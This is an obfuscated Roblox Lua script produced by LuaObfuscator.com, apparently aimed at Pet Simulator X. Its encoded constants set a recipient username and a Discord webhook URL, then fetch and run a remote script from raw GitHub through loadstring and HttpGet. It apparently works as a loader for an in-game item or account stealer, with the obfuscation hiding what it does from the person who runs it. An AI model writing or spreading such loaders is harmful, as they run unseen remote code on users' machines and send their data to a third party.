--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v84,v19);v19=nil;v92=1;end end else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -(0 -0) ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(620 -((1620 -(68 + 997)) + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v86-(v86%(928 -(214 + 713))) ;end end else local v87=0 + 0 ;local v88;while true do if (v87==(0 + 0)) then v88=2^(v32-(878 -(282 + (1865 -(226 + 1044))))) ;return (((v31%(v88 + v88))>=v88) and (1638 -(1523 + 114))) or ((0 -0) + 0) ;end end end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==1) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + (957 -(892 + 65)) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (472 -216)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + ((446 -264) -(67 + 84 + 29)) ;v36=1 + 0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * (45169940 -28392724)) + (v41 * 65536) + (v40 * 256) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,1 + 0 ,1017 -(915 + 82) ) * ((5 -3)^(19 + 13))) + v43 ;local v47=v20(v44,27 -6 ,1218 -((1507 -(145 + 293)) + 118) );local v48=((v20(v44,72 -40 )==(1 -0)) and  -((431 -(44 + 386)) + 0)) or 1 ;if (v47==(0 -0)) then if (v46==0) then return v48 * (0 + 0) ;else local v94=0;while true do if ((791 -((1854 -(998 + 488)) + 423))==v94) then v47=3 -2 ;v45=(6 + 12) -(10 + 7 + 1) ;break;end end end elseif (v47==(7874 -5827)) then return ((v46==0) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + 1)^(91 -(811 -(201 + 571)))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v68=1 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52~=0) then else v53=736 -(223 + 513) ;v54=nil;v52=1;end if ((2 + 1)~=v52) then else v59=nil;v60=nil;v52=4;end if (v52==(4 -2)) then v57=nil;v58=nil;v52=6 -3 ;end if (v52~=(6 -2)) then else v61=nil;while true do if (v53==(1 + 2)) then v60=nil;v61=nil;v53=1640 -(1373 + 263) ;end if ((1001 -(451 + 549))==v53) then v56=nil;v57=nil;v53=1 + 1 ;end if (v53~=(2 -0)) then else v58=nil;v59=nil;v53=2 + 1 ;end if ((0 -0)==v53) then local v99=1384 -(746 + 638) ;while true do if (v99==(0 + 0)) then v54=0;v55=nil;v99=1;end if (v99==1) then v53=1;break;end end end if (v53~=4) then else while true do if (v54==(0 -0)) then local v119=341 -(218 + 123) ;while true do if (v119==(1 + 0)) then v54=1582 -(1535 + 46) ;break;end if (v119==(0 -0)) then local v140=0 + 0 ;while true do if (v140==(731 -(476 + 255))) then v55=0 + 0 ;v56=nil;v140=561 -(306 + 254) ;end if (v140==(1 -0)) then v119=1 -0 ;break;end end end end end if (v54~=3) then else v61=nil;while true do local v122=0;local v123;while true do if (v122==0) then v123=0 + 0 ;while true do if (v123==(0 -0)) then if (v55~=(1469 -(899 + 568))) then else local v147=238 -(64 + 174) ;local v148;local v149;while true do if (v147~=0) then else v148=0;v149=nil;v147=1 + 0 ;end if (v147==(1 -0)) then while true do if (v148~=0) then else v149=0 + 0 ;while true do if (v149==(2 -1)) then for v161=1,v23() do local v162=0;local v163;while true do if (v162==(603 -(268 + 335))) then v163=v21();if (v20(v163,1,1)==(290 -(60 + 230))) then local v166=572 -(426 + 146) ;local v167;local v168;local v169;while true do if (v166~=(0 + 0)) then else v167=v20(v163,2,3);v168=v20(v163,4,1 + 5 );v166=1457 -(282 + 1174) ;end if (v166~=(1505 -(363 + 1141))) then else local v177=1580 -(1183 + 397) ;while true do if (v177~=(2 -1)) then else v166=2;break;end if ((0 + 0)==v177) then v169={v22(),v22(),nil,nil};if (v167==0) then local v185=0 -0 ;local v186;while true do if ((0 + 0)~=v185) then else v186=1024 -(706 + 318) ;while true do if ((0 -0)~=v186) then else v169[1254 -(721 + 530) ]=v22();v169[1937 -(565 + 1368) ]=v22();break;end end break;end end elseif (v167==1) then v169[1274 -(945 + 326) ]=v23();elseif (v167==2) then v169[3]=v23() -(2^16) ;elseif (v167==(7 -4)) then local v198=0;local v199;local v200;while true do if (v198==0) then v199=0 + 0 ;v200=nil;v198=701 -(271 + 429) ;end if (v198~=(1 + 0)) then else while true do if (v199==(1500 -(1408 + 92))) then v200=0 + 0 ;while true do if (v200~=(1086 -(461 + 625))) then else v169[3]=v23() -(2^(26 -10)) ;v169[1292 -(993 + 295) ]=v22();break;end end break;end end break;end end end v177=305 -(244 + 60) ;end end end if (v166==(1 + 2)) then if (v20(v168,1174 -(418 + 753) ,2 + 1 )~=(1 + 0)) then else v169[2 + 2 ]=v61[v169[2 + 2 ]];end v56[v161]=v169;break;end if (v166~=(531 -(406 + 123))) then else local v179=1613 -(1565 + 48) ;while true do if ((1769 -(1749 + 20))==v179) then if (v20(v168,1 + 0 ,1139 -(782 + 356) )==(1323 -(1249 + 73))) then v169[4 -2 ]=v61[v169[2]];end if (v20(v168,2 -0 ,1 + 1 )==(1876 -(157 + 1718))) then v169[1148 -(466 + 679) ]=v61[v169[6 -3 ]];end v179=1;end if (v179==(3 -2)) then v166=8 -5 ;break;end end end end end break;end end end v55=1903 -(106 + 1794) ;break;end if (0==v149) then local v159=0 -0 ;local v160;while true do if (v159==(0 -0)) then v160=0;while true do if (v160~=(1 + 0)) then else v149=1 + 0 ;break;end if (v160~=(0 -0)) then else for v171=2 -1 ,v60 do local v172=114 -(4 + 110) ;local v173;local v174;local v175;local v176;while true do if (v172==0) then local v180=584 -(57 + 527) ;while true do if ((1227 -(322 + 905))==v180) then v173=0;v174=nil;v180=1428 -(41 + 1386) ;end if (v180==(104 -(17 + 86))) then v172=1 + 0 ;break;end end end if (v172==(1191 -(449 + 740))) then while true do if (v173==(0 -0)) then local v184=947 -(245 + 702) ;while true do if (v184==1) then v173=3 -2 ;break;end if (v184==(0 -0)) then v174=166 -(122 + 44) ;v175=nil;v184=1 -0 ;end end end if (v173==(3 -2)) then v176=nil;while true do if (v174==(1 + 0)) then if (v175==(1 + 0)) then v176=v21()~=(0 -0) ;elseif (v175==(67 -(30 + 35))) then v176=v24();elseif (v175~=(3 + 0)) then else v176=v25();end v61[v171]=v176;break;end if (v174==(1257 -(1043 + 214))) then local v193=0 -0 ;local v194;while true do if (v193~=0) then else v194=0 -0 ;while true do if (0==v194) then local v201=0;while true do if ((1205 -(902 + 303))==v201) then v175=v21();v176=nil;v201=1 -0 ;end if (v201~=1) then else v194=3 -2 ;break;end end end if (v194~=(1 + 0)) then else v174=1691 -(1121 + 569) ;break;end end break;end end end end break;end end break;end if (v172~=(1213 -(323 + 889))) then else local v181=0 -0 ;while true do if (v181==1) then v172=582 -(361 + 219) ;break;end if (v181==(320 -(53 + 267))) then v175=nil;v176=nil;v181=684 -(483 + 200) ;end end end end end v59[1 + 2 ]=v21();v160=414 -(15 + 398) ;end end break;end end end end break;end end break;end end end if (v55~=(1464 -(1404 + 59))) then else local v150=0;local v151;while true do if (v150~=(982 -(18 + 964))) then else v151=0 -0 ;while true do if (v151==(0 + 0)) then local v156=0;while true do if (v156~=0) then else v59={v56,v57,nil,v58};v60=v23();v156=563 -(334 + 228) ;end if (v156==(3 -2)) then v151=1 + 0 ;break;end end end if (v151==(127 -(116 + 10))) then v61={};v55=1 + 1 ;break;end end break;end end end v123=739 -(542 + 196) ;end if (v123~=(1 -0)) then else if (v55==(1 + 2)) then local v152=236 -(141 + 95) ;local v153;while true do if (v152==0) then v153=0 -0 ;while true do if (v153~=(0 + 0)) then else local v157=0 + 0 ;while true do if (v157==0) then for v164=1 + 0 ,v23() do v57[v164-(2 -1) ]=v28();end return v59;end end end end break;end end end if (v55==(0 -0)) then local v154=0;local v155;while true do if ((0 -0)==v154) then v155=0;while true do if (v155~=1) then else v58={};v55=1552 -(1126 + 425) ;break;end if (v155==(405 -(118 + 287))) then local v158=0;while true do if (1==v158) then v155=1 + 0 ;break;end if (v158==(0 -0)) then v56={};v57={};v158=1122 -(118 + 1003) ;end end end end break;end end end break;end end break;end end end break;end if (v54==(5 -3)) then local v120=377 -(142 + 235) ;while true do if (v120==(0 -0)) then v59=nil;v60=nil;v120=1 + 0 ;end if (1==v120) then v54=3;break;end end end if (v54==(978 -(553 + 424))) then local v121=0;while true do if (v121~=0) then else local v141=0 -0 ;while true do if (v141==1) then v121=1 + 0 ;break;end if (0==v141) then v57=nil;v58=nil;v141=164 -(92 + 71) ;end end end if (v121==(1 + 0)) then v54=2 + 0 ;break;end end end end break;end end break;end if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=1 + 1 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83>0) then local v100;local v101;v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v101=v82[2];v100=v80[v82[3]];v80[v101 + 1 ]=v100;v80[v101]=v100[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];else local v111=0;local v112;local v113;while true do if (v111==0) then v112=v82[2];v113=v80[v82[3]];v111=1;end if (1==v111) then v80[v112 + 1 ]=v113;v80[v112]=v113[v82[4]];break;end end end elseif (v83<=2) then v80[v82[2]]();elseif (v83>3) then do return;end else local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==0) then v125=v82[2];v126,v127=v73(v80[v125](v13(v80,v125 + 1 ,v82[3])));v124=1;end if (v124==1) then v75=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==2) then for v143=v125,v75 do local v144=0;while true do if (v144==0) then v128=v128 + 1 ;v80[v143]=v126[v128];break;end end end break;end end end elseif (v83<=6) then if (v83==5) then v80[v82[2]]=v82[3]~=0 ;else v80[v82[2]]=v82[3];end elseif (v83<=7) then local v117=0;local v118;while true do if (v117==0) then v118=v82[2];v80[v118]=v80[v118](v13(v80,v118 + 1 ,v75));break;end end elseif (v83>8) then v80[v82[2]]=v64[v82[3]];else v64[v82[3]]=v80[v82[2]];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365724E616D6503083O00736C656E646C747903073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130383536313038343836313930363937362F6E4F50735F3973796765573167794178764B4D666B4E715A73545330743269306E4B664248475068436472654E32656954717A3355495A4B5A6A53512O536C6E5A35684E03073O004D656E74696F6E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F5053582F6D61696E2F5363726970742E6C7561000F3O0012013O00023O00124O00013O00124O00043O00124O00038O00013O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0005000400014O0003000100044O00075O00022O00023O000100012O00043O00017O00",v9(),...);end
